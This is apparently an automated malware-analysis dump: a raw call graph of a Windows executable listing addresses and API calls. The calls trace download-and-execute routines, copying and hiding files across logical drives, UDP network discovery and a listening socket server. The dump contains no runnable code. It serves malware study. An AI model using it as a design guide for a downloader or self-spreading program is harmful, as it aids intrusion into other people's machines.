4745->4747 4746->4715 4750 4025b2 _invalid_parameter 4747->4750 4748 4025e2 memcpy 4749 402606 _invalid_parameter 4748->4749 4751 40ab60 __aligned_recalloc_base 3 API calls 4749->4751 4750->4748 4754 40ab60 4750->4754 4751->4746 4761 40a800 GetCurrentProcessId 4754->4761 4756 40ab6b 4757 4025df 4756->4757 4762 40aaa0 4756->4762 4757->4748 4760 40ab87 HeapFree 4760->4757 4761->4756 4763 40aad0 HeapValidate 4762->4763 4764 40aaf0 4762->4764 4763->4764 4764->4757 4764->4760 4782 40abd0 4765->4782 4770 40ab60 __aligned_recalloc_base 3 API calls 4771 40d211 4770->4771 4771->4551 4995 40a990 4772->4995 4775 405d6a memcpy 4776 40abd0 8 API calls 4775->4776 4777 405da1 4776->4777 5005 40cb40 4777->5005 4780 405e28 4780->4551 4783 40abfd 4782->4783 4784 40a950 __aligned_recalloc_base 7 API calls 4783->4784 4785 40ac12 4783->4785 4786 40ac14 memcpy 4783->4786 4784->4783 4785->4771 4787 40c6e0 4785->4787 4786->4783 4791 40c6ea 4787->4791 4789 40c709 4789->4770 4789->4771 4791->4789 4792 40c721 memcmp 4791->4792 4793 40c748 4791->4793 4795 40ab60 __aligned_recalloc_base 3 API calls 4791->4795 4796 40cbd0 4791->4796 4810 4084a0 4791->4810 4792->4791 4794 40ab60 __aligned_recalloc_base 3 API calls 4793->4794 4794->4789 4795->4791 4797 40cbdf __aligned_recalloc_base 4796->4797 4798 40a950 __aligned_recalloc_base 7 API calls 4797->4798 4800 40cbe9 4797->4800 4799 40cc78 4798->4799 4799->4800 4801 402420 7 API calls 4799->4801 4800->4791 4802 40cc8d 4801->4802 4803 402420 7 API calls 4802->4803 4804 40cc95 4803->4804 4806 40cced __aligned_recalloc_base 4804->4806 4813 40cd40 4804->4813 4818 402470 4806->4818 4809 402470 3 API calls 4809->4800 4926 40a6c0 4810->4926 4814 4024e0 10 API calls 4813->4814 4815 40cd54 4814->4815 4824 4026f0 4815->4824 4817 40cd6c 4817->4804 4820 402484 _invalid_parameter 4818->4820 4821 4024ce 4818->4821 4819 40ab60 __aligned_recalloc_base 3 API calls 4819->4821 4822 40ab60 __aligned_recalloc_base 3 API calls 4820->4822 4823 4024ac 4820->4823 4821->4809 4822->4823 4823->4819 4827 402710 4824->4827 4826 40270a 4826->4817 4828 402724 4827->4828 4829 402540 __aligned_recalloc_base 10 API calls 4828->4829 4830 40276d 4829->4830 4831 402540 __aligned_recalloc_base 10 API calls 4830->4831 4832 40277d 4831->4832 4833 402540 __aligned_recalloc_base 10 API calls 4832->4833 4834 40278d 4833->4834 4835 402540 __aligned_recalloc_base 10 API calls 4834->4835 4836 40279d 4835->4836 4837 4027a6 4836->4837 4838 4027cf 4836->4838 4842 403e20 4837->4842 4859 403df0 4838->4859 4841 4027c7 _invalid_parameter 4841->4826 4843 402820 _invalid_parameter 7 API calls 4842->4843 4844 403e37 4843->4844 4845 402820 _invalid_parameter 7 API calls 4844->4845 4846 403e46 4845->4846 4847 402820 _invalid_parameter 7 API calls 4846->4847 4848 403e55 4847->4848 4849 402820 _invalid_parameter 7 API calls 4848->4849 4850 403e64 _invalid_parameter 4849->4850 4853 40400f _invalid_parameter 4850->4853 4862 402850 4850->4862 4852 402850 _invalid_parameter 3 API calls 4852->4853 4853->4852 4854 404035 _invalid_parameter 4853->4854 4855 402850 _invalid_parameter 3 API calls 4854->4855 4856 40405b _invalid_parameter 4854->4856 4855->4854 4857 402850 _invalid_parameter 3 API calls 4856->4857 4858 404081 4856->4858 4857->4856 4858->4841 4866 404090 4859->4866 4861 403e0c 4861->4841 4863 402866 4862->4863 4864 40285b 4862->4864 4863->4850 4865 40ab60 __aligned_recalloc_base 3 API calls 4864->4865 4865->4863 4867 4040a6 _invalid_parameter 4866->4867 4868 4040dd 4867->4868 4870 4040b8 _invalid_parameter 4867->4870 4873 404103 4867->4873 4896 403ca0 4868->4896 4870->4861 4871 40413d 4906 404680 4871->4906 4872 40415e 4875 402820 _invalid_parameter 7 API calls 4872->4875 4873->4871 4873->4872 4876 40416f 4875->4876 4877 402820 _invalid_parameter 7 API calls 4876->4877 4878 40417e 4877->4878 4879 402820 _invalid_parameter 7 API calls 4878->4879 4880 40418d 4879->4880 4881 402820 _invalid_parameter 7 API calls 4880->4881 4882 40419c 4881->4882 4919 403d70 4882->4919 4884 402820 _invalid_parameter 7 API calls 4885 4041ca _invalid_parameter 4884->4885 4885->4884 4888 404284 _invalid_parameter 4885->4888 4886 402850 _invalid_parameter 3 API calls 4886->4888 4887 4045a3 _invalid_parameter 4889 402850 _invalid_parameter 3 API calls 4887->4889 4890 4045c9 _invalid_parameter 4887->4890 4888->4886 4888->4887 4889->4887 4891 402850 _invalid_parameter 3 API calls 4890->4891 4892 4045ef _invalid_parameter 4890->4892 4891->4890 4893 402850 _invalid_parameter 3 API calls 4892->4893 4894 404615 _invalid_parameter 4892->4894 4893->4892 4894->4870 4895 402850 _invalid_parameter 3 API calls 4894->4895 4895->4894 4897 403cae 4896->4897 4898 402820 _invalid_parameter 7 API calls 4897->4898 4899 403ccb 4898->4899 4900 402820 _invalid_parameter 7 API calls 4899->4900 4901 403cda _invalid_parameter 4900->4901 4902 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4901->4902 4903 403d3a _invalid_parameter 4901->4903 4902->4901 4904 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4903->4904 4905 403d60 4903->4905 4904->4903 4905->4870 4907 402820 _invalid_parameter 7 API calls 4906->4907 4908 404697 4907->4908 4909 402820 _invalid_parameter 7 API calls 4908->4909 4910 4046a6 4909->4910 4911 402820 _invalid_parameter 7 API calls 4910->4911 4918 4046b5 _invalid_parameter 4911->4918 4912 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4912->4918 4913 404841 _invalid_parameter 4914 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4913->4914 4915 404867 _invalid_parameter 4913->4915 4914->4913 4916 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4915->4916 4917 40488d 4915->4917 4916->4915 4917->4870 4918->4912 4918->4913 4920 402820 _invalid_parameter 7 API calls 4919->4920 4921 403d7f _invalid_parameter 4920->4921 4922 403ca0 _invalid_parameter 9 API calls 4921->4922 4923 403db8 _invalid_parameter 4922->4923 4924 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4923->4924 4925 403de3 4923->4925 4924->4923 4925->4885 4927 40a6d2 4926->4927 4930 40a620 4927->4930 4931 40a950 __aligned_recalloc_base 7 API calls 4930->4931 4938 40a630 4931->4938 4934 40ab60 __aligned_recalloc_base 3 API calls 4936 4084bf 4934->4936 4935 40a66c 4935->4934 4936->4791 4938->4935 4938->4936 4939 409b50 4938->4939 4946 40a140 4938->4946 4951 40a510 4938->4951 4940 409b63 4939->4940 4945 409b59 4939->4945 4941 409ba6 memset 4940->4941 4940->4945 4942 409bc7 4941->4942 4941->4945 4943 409bcd memcpy 4942->4943 4942->4945 4959 409920 4943->4959 4945->4938 4947 40a14d 4946->4947 4948 40a157 4946->4948 4947->4938 4948->4947 4949 40a24f memcpy 4948->4949 4964 409e70 4948->4964 4949->4948 4954 40a526 4951->4954 4957 40a51c 4951->4957 4952 409e70 64 API calls 4953 40a5a7 4952->4953 4955 409920 6 API calls 4953->4955 4953->4957 4954->4952 4954->4957 4956 40a5c6 4955->4956 4956->4957 4958 40a5db memcpy 4956->4958 4957->4938 4958->4957 4960 40996e 4959->4960 4961 40992e 4959->4961 4960->4945 4961->4960 4963 409860 6 API calls 4961->4963 4963->4961 4966 409e8a 4964->4966 4967 409e80 4964->4967 4966->4967 4974 409cb0 4966->4974 4967->4948 4969 409fc8 memcpy 4969->4967 4971 409fe7 memcpy 4972 40a111 4971->4972 4973 409e70 62 API calls 4972->4973 4973->4967 4975 409cbd 4974->4975 4976 409cc7 4974->4976 4975->4967 4975->4969 4975->4971 4976->4975 4977 409d50 4976->4977 4979 409d55 4976->4979 4980 409d38 4976->4980 4985 409610 4977->4985 4981 409920 6 API calls 4979->4981 4983 409920 6 API calls 4980->4983 4981->4977 4983->4977 4984 409dfc memset 4984->4975 4986 40961f 4985->4986 4987 409629 4985->4987 4986->4975 4986->4984 4987->4986 4988 4094e0 9 API calls 4987->4988 4989 409722 4988->4989 4990 40a950 __aligned_recalloc_base 7 API calls 4989->4990 4991 409771 4990->4991 4991->4986 4992 409350 46 API calls 4991->4992 4993 40979e 4992->4993 4994 40ab60 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4993->4994 4994->4986 5014 40a800 GetCurrentProcessId 4995->5014 4997 40a99b 4998 40a820 __aligned_recalloc_base 5 API calls 4997->4998 5003 40a9a7 __aligned_recalloc_base 4997->5003 4998->5003 4999 405d55 4999->4775 4999->4780 5000 40aa50 HeapAlloc 5000->5003 5001 40aa1a HeapReAlloc 5001->5003 5002 40aaa0 __aligned_recalloc_base HeapValidate 5002->5003 5003->4999 5003->5000 5003->5001 5003->5002 5004 40ab60 __aligned_recalloc_base 3 API calls 5003->5004 5004->5003 5007 40cb4b 5005->5007 5006 40a950 __aligned_recalloc_base 7 API calls 5006->5007 5007->5006 5008 405ded 5007->5008 5008->4780 5009 4076c0 5008->5009 5010 40a950 __aligned_recalloc_base 7 API calls 5009->5010 5011 4076d0 5010->5011 5012 407717 5011->5012 5013 4076dc memcpy CreateThread CloseHandle 5011->5013 5012->4780 5013->5012 5015 407720 GetTickCount srand rand Sleep 5013->5015 5014->4997 5016 407757 5015->5016 5017 4077ad 5015->5017 5018 4077ab 5016->5018 5020 407766 StrChrA 5016->5020 5025 40f560 9 API calls 5016->5025 5017->5018 5021 40f560 63 API calls 5017->5021 5019 40ab60 __aligned_recalloc_base 3 API calls 5018->5019 5022 4077d8 5019->5022 5020->5016 5021->5018 5026 40f623 InternetOpenUrlW 5025->5026 5027 40f78e InternetCloseHandle Sleep 5025->5027 5028 40f781 InternetCloseHandle 5026->5028 5029 40f652 CreateFileW 5026->5029 5030 40f7b5 6 API calls 5027->5030 5031 407795 Sleep 5027->5031 5028->5027 5032 40f681 InternetReadFile 5029->5032 5033 40f774 CloseHandle 5029->5033 5030->5031 5034 40f831 wsprintfW DeleteFileW Sleep 5030->5034 5031->5016 5035 40f6d4 CloseHandle wsprintfW DeleteFileW Sleep 5032->5035 5036 40f6a5 5032->5036 5033->5028 5037 40f240 21 API calls 5034->5037 5053 40f240 CreateFileW 5035->5053 5036->5035 5038 40f6ae WriteFile 5036->5038 5040 40f871 5037->5040 5038->5032 5042 40f87b Sleep 5040->5042 5043 40f8af DeleteFileW 5040->5043 5046 40f400 6 API calls 5042->5046 5043->5031 5044 40f767 DeleteFileW 5044->5033 5045 40f72b Sleep 5047 40f400 6 API calls 5045->5047 5048 40f892 5046->5048 5049 40f742 5047->5049 5048->5031 5051 40f8a5 ExitProcess 5048->5051 5050 40f75e 5049->5050 5052 40f756 ExitProcess 5049->5052 5050->5033 5054 40f285 CreateFileMappingW 5053->5054 5055 40f39a 5053->5055 5056 40f390 CloseHandle 5054->5056 5057 40f2a6 MapViewOfFile 5054->5057 5058 40f3a0 CreateFileW 5055->5058 5059 40f3f1 5055->5059 5056->5055 5060 40f2c5 GetFileSize 5057->5060 5061 40f386 CloseHandle 5057->5061 5062 40f3c2 WriteFile CloseHandle 5058->5062 5063 40f3e8 5058->5063 5059->5044 5059->5045 5065 40f2e1 5060->5065 5066 40f37c UnmapViewOfFile 5060->5066 5061->5056 5062->5063 5064 40ab60 __aligned_recalloc_base 3 API calls 5063->5064 5064->5059 5075 40d1a0 5065->5075 5066->5061 5069 40cb40 7 API calls 5070 40f330 5069->5070 5070->5066 5071 40f34d memcmp 5070->5071 5071->5066 5072 40f369 5071->5072 5073 40ab60 __aligned_recalloc_base 3 API calls 5072->5073 5074 40f372 5073->5074 5074->5066 5076 40cbd0 10 API calls 5075->5076 5077 40d1c4 5076->5077 5077->5066 5077->5069 5079 40e2ee 5078->5079 5080 40e1bd htons inet_addr setsockopt 5078->5080 5079->4562 5081 40b430 8 API calls 5080->5081 5082 40e236 bind lstrlenA sendto ioctlsocket 5081->5082 5086 40e28b 5082->5086 5083 40e2b2 5135 40b4f0 shutdown closesocket 5083->5135 5086->5083 5087 40a990 9 API calls 5086->5087 5126 40e310 5086->5126 5087->5086 5142 40e640 memset InternetCrackUrlA InternetOpenA 5088->5142 5091 40e51e 5091->4562 5093 40ab60 __aligned_recalloc_base 3 API calls 5093->5091 5097 40e4eb 5097->5093 5100 40e4e1 SysFreeString 5100->5097 5249 40b3f0 inet_addr 5103->5249 5106 40b48c connect 5107 40b4a0 getsockname 5106->5107 5108 40b4d4 5106->5108 5107->5108 5252 40b4f0 shutdown closesocket 5108->5252 5110 40b4dd 5111 40eef0 5110->5111 5253 40b3d0 inet_ntoa 5111->5253 5113 40ef06 5114 40d470 11 API calls 5113->5114 5115 40ef25 5114->5115 5121 40e14c 5115->5121 5254 40ef70 memset InternetCrackUrlA InternetOpenA 5115->5254 5118 40ab60 __aligned_recalloc_base 3 API calls 5120 40ef5c 5118->5120 5119 40ab60 __aligned_recalloc_base 3 API calls 5119->5121 5120->5119 5121->4567 5125 40ac84 5122->5125 5123 40ac8a 5123->4557 5124 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5124->5125 5125->5123 5125->5124 5127 40e32c 5126->5127 5128 40e3f4 5127->5128 5129 40e348 recvfrom 5127->5129 5128->5086 5130 40e376 StrCmpNIA 5129->5130 5131 40e369 Sleep 5129->5131 5130->5127 5132 40e395 StrStrIA 5130->5132 5131->5127 5132->5127 5133 40e3b6 StrChrA 5132->5133 5136 40d320 5133->5136 5135->5079 5137 40d32b 5136->5137 5138 40d331 lstrlenA 5137->5138 5139 40d344 5137->5139 5140 40a950 __aligned_recalloc_base 7 API calls 5137->5140 5141 40d360 memcpy 5137->5141 5138->5137 5138->5139 5139->5127 5140->5137 5141->5137 5141->5139 5143 40e6e1 InternetConnectA 5142->5143 5144 40e41a 5142->5144 5145 40e84a InternetCloseHandle 5143->5145 5146 40e71a HttpOpenRequestA 5143->5146 5144->5091 5155 40e530 5144->5155 5145->5144 5147 40e750 HttpSendRequestA 5146->5147 5148 40e83d InternetCloseHandle 5146->5148 5149 40e830 InternetCloseHandle 5147->5149 5151 40e76d 5147->5151 5148->5145 5149->5148 5150 40e78e InternetReadFile 5150->5151 5152 40e7bb 5150->5152 5151->5150 5151->5152 5153 40a990 9 API calls 5151->5153 5152->5149 5154 40e7d6 memcpy 5153->5154 5154->5151 5184 40d250 5155->5184 5158 40e433 5158->5097 5165 40eea0 5158->5165 5159 40e55a SysAllocString 5160 40e571 CoCreateInstance 5159->5160 5161 40e627 5159->5161 5162 40e61d SysFreeString 5160->5162 5164 40e596 5160->5164 5163 40ab60 __aligned_recalloc_base 3 API calls 5161->5163 5162->5161 5163->5158 5164->5162 5201 40e9f0 5165->5201 5168 40e870 5206 40ecc0 5168->5206 5173 40ee20 6 API calls 5174 40e8c7 5173->5174 5180 40e4b2 5174->5180 5223 40eae0 5174->5223 5177 40e8ff 5177->5180 5228 40e990 5177->5228 5178 40eae0 6 API calls 5178->5177 5180->5100 5181 40d470 5180->5181 5244 40d3e0 5181->5244 5188 40d25d 5184->5188 5185 40d263 lstrlenA 5185->5188 5190 40d276 5185->5190 5187 40a950 __aligned_recalloc_base 7 API calls 5187->5188 5188->5185 5188->5187 5188->5190 5191 40ab60 __aligned_recalloc_base 3 API calls 5188->5191 5192 405740 5188->5192 5196 4056f0 5188->5196 5190->5158 5190->5159 5191->5188 5193 405757 MultiByteToWideChar 5192->5193 5194 40574a lstrlenA 5192->5194 5195 40577c 5193->5195 5194->5193 5195->5188 5199 4056fb 5196->5199 5197 405701 lstrlenA 5197->5199 5198 405740 2 API calls 5198->5199 5199->5197 5199->5198 5200 405737 5199->5200 5200->5188 5204 40ea16 5201->5204 5202 40e49d 5202->5097 5202->5168 5203 40ea93 lstrcmpiW 5203->5204 5205 40eaab SysFreeString 5203->5205 5204->5202 5204->5203 5204->5205 5205->5204 5208 40ece6 5206->5208 5207 40e88b 5207->5180 5218 40ee20 5207->5218 5208->5207 5209 40ed73 lstrcmpiW 5208->5209 5210 40edf3 SysFreeString 5209->5210 5211 40ed86 5209->5211 5210->5207 5212 40e990 2 API calls 5211->5212 5214 40ed94 5212->5214 5213 40ede5 5213->5210 5214->5210 5214->5213 5215 40edc3 lstrcmpiW 5214->5215 5216 40edd5 5215->5216 5217 40eddb SysFreeString 5215->5217 5216->5217 5217->5213 5219 40e990 2 API calls 5218->5219 5220 40ee3b 5219->5220 5221 40ecc0 6 API calls 5220->5221 5222 40e8a9 5220->5222 5221->5222 5222->5173 5222->5180 5224 40e990 2 API calls 5223->5224 5226 40eafb 5224->5226 5225 40e8e5 5225->5177 5225->5178 5226->5225 5232 40eb60 5226->5232 5229 40e9b6 5228->5229 5230 40e9cd 5229->5230 5231 40e9f0 2 API calls 5229->5231 5230->5180 5231->5230 5233 40eb86 5232->5233 5234 40ec9d 5233->5234 5235 40ec13 lstrcmpiW 5233->5235 5234->5225 5236 40ec93 SysFreeString 5235->5236 5237 40ec26 5235->5237 5236->5234 5238 40e990 2 API calls 5237->5238 5240 40ec34 5238->5240 5239 40ec85 5239->5236 5240->5236 5240->5239 5241 40ec63 lstrcmpiW 5240->5241 5242 40ec75 5241->5242 5243 40ec7b SysFreeString 5241->5243 5242->5243 5243->5239 5245 40d3ed 5244->5245 5246 40d408 SysFreeString 5245->5246 5247 40a990 9 API calls 5245->5247 5248 40d390 _vscprintf wvsprintfA 5245->5248 5246->5100 5247->5245 5248->5245 5250 40b41c socket 5249->5250 5251 40b409 gethostbyname 5249->5251 5250->5106 5250->5110 5251->5250 5252->5110 5253->5113 5255 40ef47 5254->5255 5256 40f014 InternetConnectA 5254->5256 5255->5118 5255->5120 5257 40f194 InternetCloseHandle 5256->5257 5258 40f04d HttpOpenRequestA 5256->5258 5257->5255 5259 40f083 HttpAddRequestHeadersA HttpSendRequestA 5258->5259 5260 40f187 InternetCloseHandle 5258->5260 5261 40f17a InternetCloseHandle 5259->5261 5262 40f0cd 5259->5262 5260->5257 5261->5260 5263 40f0e4 InternetReadFile 5262->5263 5264 40f111 5262->5264 5265 40a990 9 API calls 5262->5265 5263->5262 5263->5264 5264->5261 5266 40f12c memcpy 5265->5266 5266->5262 5272 407417 5267->5272 5268 4075eb 5269 4075f4 SysFreeString 5268->5269 5271 4073bb SysFreeString 5268->5271 5269->5271 5270 40ab60 __aligned_recalloc_base 3 API calls 5270->5268 5271->4570 5273 407670 CoCreateInstance 5272->5273 5274 407566 SysAllocString 5272->5274 5275 407432 5272->5275 5273->5272 5274->5272 5274->5275 5275->5268 5275->5270 5277 40c87a 5276->5277 5278 40c87e 5276->5278 5277->4576 5280 40c830 CryptAcquireContextW 5278->5280 5281 40c86b 5280->5281 5282 40c84d CryptGenRandom CryptReleaseContext 5280->5282 5281->5277 5282->5281 5283->4592 5335 40b780 gethostname 5284->5335 5287 40b869 5287->4592 5289 40b87c strcmp 5289->5287 5290 40b891 5289->5290 5339 40b3d0 inet_ntoa 5290->5339 5292 40b89f strstr 5293 40b8f0 5292->5293 5294 40b8af 5292->5294 5342 40b3d0 inet_ntoa 5293->5342 5340 40b3d0 inet_ntoa 5294->5340 5297 40b8bd strstr 5297->5287 5299 40b8cd 5297->5299 5298 40b8fe strstr 5300 40b90e 5298->5300 5301 40b94f 5298->5301 5341 40b3d0 inet_ntoa 5299->5341 5343 40b3d0 inet_ntoa 5300->5343 5345 40b3d0 inet_ntoa 5301->5345 5305 40b95d strstr 5308 40b96d 5305->5308 5309 40b9ae EnterCriticalSection 5305->5309 5306 40b8db strstr 5306->5287 5306->5293 5307 40b91c strstr 5307->5287 5310 40b92c 5307->5310 5346 40b3d0 inet_ntoa 5308->5346 5312 40b9c6 5309->5312 5344 40b3d0 inet_ntoa 5310->5344 5320 40b9f1 5312->5320 5348 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5312->5348 5314 40b97b strstr 5314->5287 5316 40b98b 5314->5316 5315 40b93a strstr 5315->5287 5315->5301 5347 40b3d0 inet_ntoa 5316->5347 5319 40baea LeaveCriticalSection 5319->5287 5320->5319 5322 40a740 7 API calls 5320->5322 5321 40b999 strstr 5321->5287 5321->5309 5323 40ba35 5322->5323 5323->5319 5349 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5323->5349 5325 40ba53 5326 40ba80 5325->5326 5327 40ba76 Sleep 5325->5327 5329 40baa5 5325->5329 5328 40ab60 __aligned_recalloc_base 3 API calls 5326->5328 5327->5325 5328->5329 5329->5319 5350 40b530 5329->5350 5331->4604 5333 40b530 14 API calls 5332->5333 5334 40b523 LeaveCriticalSection 5333->5334 5334->4599 5336 40b7c3 5335->5336 5337 40b7a7 gethostbyname 5335->5337 5336->5287 5338 40b3d0 inet_ntoa 5336->5338 5337->5336 5338->5289 5339->5292 5340->5297 5341->5306 5342->5298 5343->5307 5344->5315 5345->5305 5346->5314 5347->5321 5348->5320 5349->5325 5351 40b544 5350->5351 5358 40b53f 5350->5358 5352 40a950 __aligned_recalloc_base 7 API calls 5351->5352 5353 40b558 5352->5353 5354 40b5b4 CreateFileW 5353->5354 5353->5358 5355 40b603 InterlockedExchange 5354->5355 5356 40b5d7 WriteFile FlushFileBuffers CloseHandle 5354->5356 5357 40ab60 __aligned_recalloc_base 3 API calls 5355->5357 5356->5355 5357->5358 5358->5319 5362 40dcdd 5359->5362 5360 40dc13 5360->4611 5360->4612 5361 40dd01 WaitForSingleObject 5361->5362 5363 40dd1c CloseHandle 5361->5363 5362->5360 5362->5361 5363->5362 5367 407840 5364->5367 5365 407868 Sleep 5365->5367 5366 40791a Sleep 5366->5367 5367->5365 5367->5366 5368 407897 Sleep wsprintfA DeleteUrlCacheEntry 5367->5368 5370 40f560 63 API calls 5367->5370 5394 40f4b0 InternetOpenA 5368->5394 5370->5367 5372 4058c9 memset GetModuleHandleW 5371->5372 5373 405902 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5372->5373 5373->5373 5374 405940 CreateWindowExW 5373->5374 5375 40596b 5374->5375 5376 40596d GetMessageA 5374->5376 5377 40599f ExitThread 5375->5377 5378 405981 TranslateMessage DispatchMessageA 5376->5378 5379 405997 5376->5379 5378->5376 5379->5372 5379->5377 5401 40f1f0 CreateFileW 5380->5401 5382 4070f8 ExitThread 5384 406fa0 5384->5382 5385 4070e8 Sleep 5384->5385 5386 406fd9 5384->5386 5404 4063e0 GetLogicalDrives 5384->5404 5385->5384 5410 406300 5386->5410 5389 407010 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5390 407086 wsprintfW 5389->5390 5391 40709b wsprintfW 5389->5391 5390->5391 5416 4068e0 _chkstk 5391->5416 5393 40700b 5395 40f4d6 InternetOpenUrlA 5394->5395 5396 40f548 Sleep 5394->5396 5397 40f4f5 HttpQueryInfoA 5395->5397 5398 40f53e InternetCloseHandle 5395->5398 5396->5367 5399 40f534 InternetCloseHandle 5397->5399 5400 40f51e 5397->5400 5398->5396 5399->5398 5400->5399 5402 40f238 5401->5402 5403 40f21f GetFileSize CloseHandle 5401->5403 5402->5384 5403->5402 5409 40640d 5404->5409 5405 406486 5405->5384 5406 40641c RegOpenKeyExW 5407 40643e RegQueryValueExW 5406->5407 5406->5409 5408 40647a RegCloseKey 5407->5408 5407->5409 5408->5409 5409->5405 5409->5406 5409->5408 5411 406359 5410->5411 5412 40631c 5410->5412 5411->5389 5411->5393 5475 406360 GetDriveTypeW 5412->5475 5415 40634b lstrcpyW 5415->5411 5417 4068fe 7 API calls 5416->5417 5448 4068f7 5416->5448 5418 4069d2 5417->5418 5419 406a14 PathFileExistsW 5417->5419 5420 40f1f0 3 API calls 5418->5420 5421 406ac4 5419->5421 5422 406a29 PathFileExistsW 5419->5422 5424 4069de 5420->5424 5423 406af5 PathFileExistsW 5421->5423 5480 4064a0 7 API calls 5421->5480 5425 406a59 PathFileExistsW 5422->5425 5426 406a3a SetFileAttributesW DeleteFileW 5422->5426 5431 406b06 5423->5431 5432 406b47 PathFileExistsW 5423->5432 5424->5419 5430 4069f5 SetFileAttributesW DeleteFileW 5424->5430 5427 406a6a CreateDirectoryW 5425->5427 5428 406a8c PathFileExistsW 5425->5428 5426->5425 5427->5428 5433 406a7d SetFileAttributesW 5427->5433 5428->5421 5436 406a9d CopyFileW 5428->5436 5430->5419 5437 40f1f0 3 API calls 5431->5437 5434 406b58 5432->5434 5435 406bca PathFileExistsW 5432->5435 5433->5428 5434->5435 5439 406b64 PathFileExistsW 5434->5439 5441 406c75 FindFirstFileW 5435->5441 5442 406bdf PathFileExistsW 5435->5442 5436->5421 5440 406ab5 SetFileAttributesW 5436->5440 5438 406b12 5437->5438 5438->5432 5444 406b28 SetFileAttributesW DeleteFileW 5438->5444 5439->5435 5445 406b73 CopyFileW 5439->5445 5440->5421 5441->5448 5472 406c9c 5441->5472 5446 406bf0 5442->5446 5447 406c2c 5442->5447 5443 406ad4 5443->5423 5449 40f1f0 3 API calls 5443->5449 5444->5432 5445->5435 5452 406b8b SetFileAttributesW PathFileExistsW 5445->5452 5453 406c12 5446->5453 5454 406bf8 5446->5454 5450 406c34 5447->5450 5451 406c4e 5447->5451 5448->5393 5456 406aed 5449->5456 5457 406660 4 API calls 5450->5457 5458 406660 4 API calls 5451->5458 5452->5435 5459 406bab SetFileAttributesW DeleteFileW 5452->5459 5462 406660 4 API calls 5453->5462 5490 406660 CoInitialize CoCreateInstance 5454->5490 5455 406d5e lstrcmpW 5461 406d74 lstrcmpW 5455->5461 5455->5472 5456->5423 5463 406c0d SetFileAttributesW 5457->5463 5458->5463 5459->5435 5461->5472 5462->5463 5463->5441 5464 406f35 FindNextFileW 5464->5455 5466 406f51 FindClose 5464->5466 5466->5448 5467 406dba lstrcmpiW 5467->5472 5468 406e21 PathMatchSpecW 5469 406e42 wsprintfW SetFileAttributesW DeleteFileW 5468->5469 5468->5472 5469->5472 5470 406e9f PathFileExistsW 5471 406eb5 wsprintfW wsprintfW 5470->5471 5470->5472 5471->5472 5473 406f1f MoveFileExW 5471->5473 5472->5455 5472->5464 5472->5467 5472->5468 5472->5470 5495 4067a0 CreateDirectoryW wsprintfW FindFirstFileW 5472->5495 5473->5464 5476 406388 5475->5476 5479 40633f 5475->5479 5477 40639c QueryDosDeviceW 5476->5477 5476->5479 5478 4063b6 StrCmpNW 5477->5478 5477->5479 5478->5479 5479->5411 5479->5415 5481 406640 InternetCloseHandle 5480->5481 5482 40653e InternetOpenUrlW 5480->5482 5481->5443 5483 406633 InternetCloseHandle 5482->5483 5484 40656b CreateFileW 5482->5484 5483->5481 5485 406626 CloseHandle 5484->5485 5486 406598 InternetReadFile 5484->5486 5485->5483 5487 4065eb CloseHandle wsprintfW DeleteFileW 5486->5487 5488 4065bc 5486->5488 5487->5485 5488->5487 5489 4065c5 WriteFile 5488->5489 5489->5486 5491 406696 5490->5491 5494 4066ee 5490->5494 5492 4066a9 wsprintfW 5491->5492 5493 4066cf wsprintfW 5491->5493 5491->5494 5492->5494 5493->5494 5494->5463 5496 4067f5 lstrcmpW 5495->5496 5497 4068cf 5495->5497 5498 40680b lstrcmpW 5496->5498 5502 406821 5496->5502 5497->5472 5499 406823 wsprintfW wsprintfW 5498->5499 5498->5502 5501 406886 MoveFileExW 5499->5501 5499->5502 5500 40689c FindNextFileW 5500->5496 5503 4068b8 FindClose RemoveDirectoryW 5500->5503 5501->5500 5502->5500 5503->5497 5871 40d980 5877 4021b0 5871->5877 5874 40d9bf 5875 40d9a5 WaitForSingleObject 5881 401600 5875->5881 5878 4021bb 5877->5878 5879 4021cf 5877->5879 5878->5879 5902 402020 5878->5902 5879->5874 5879->5875 5882 401737 5881->5882 5883 40160d 5881->5883 5882->5874 5883->5882 5884 401619 EnterCriticalSection 5883->5884 5885 401630 5884->5885 5886 4016b5 LeaveCriticalSection SetEvent 5884->5886 5885->5886 5891 401641 InterlockedDecrement 5885->5891 5893 40165a InterlockedExchangeAdd 5885->5893 5900 4016a0 InterlockedDecrement 5885->5900 5887 4016d0 5886->5887 5888 4016e8 5886->5888 5889 4016d6 PostQueuedCompletionStatus 5887->5889 5890 40dd50 11 API calls 5888->5890 5889->5888 5889->5889 5892 4016f3 5890->5892 5891->5885 5894 40de90 7 API calls 5892->5894 5893->5885 5895 40166d InterlockedIncrement 5893->5895 5896 4016fc CloseHandle CloseHandle WSACloseEvent 5894->5896 5897 401c50 4 API calls 5895->5897 5923 40b4f0 shutdown closesocket 5896->5923 5897->5885 5899 401724 DeleteCriticalSection 5901 40ab60 __aligned_recalloc_base 3 API calls 5899->5901 5900->5885 5901->5882 5903 40a740 7 API calls 5902->5903 5904 40202b 5903->5904 5905 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5904->5905 5911 4021a5 5904->5911 5906 402076 CreateIoCompletionPort 5905->5906 5907 40219f 5905->5907 5906->5907 5908 40208f 5906->5908 5909 401600 36 API calls 5907->5909 5910 40dbb0 8 API calls 5908->5910 5909->5911 5912 402094 5910->5912 5911->5879 5912->5907 5913 40209f WSASocketA 5912->5913 5913->5907 5914 4020bd setsockopt htons bind 5913->5914 5914->5907 5915 402126 listen 5914->5915 5915->5907 5916 40213a WSACreateEvent 5915->5916 5916->5907 5917 402147 WSAEventSelect 5916->5917 5917->5907 5918 402159 5917->5918 5919 40217f 5918->5919 5920 40dbe0 17 API calls 5918->5920 5921 40dbe0 17 API calls 5919->5921 5920->5918 5922 402194 5921->5922 5922->5879 5923->5899 5936 406085 5938 405ffe 5936->5938 5937 40608a LeaveCriticalSection 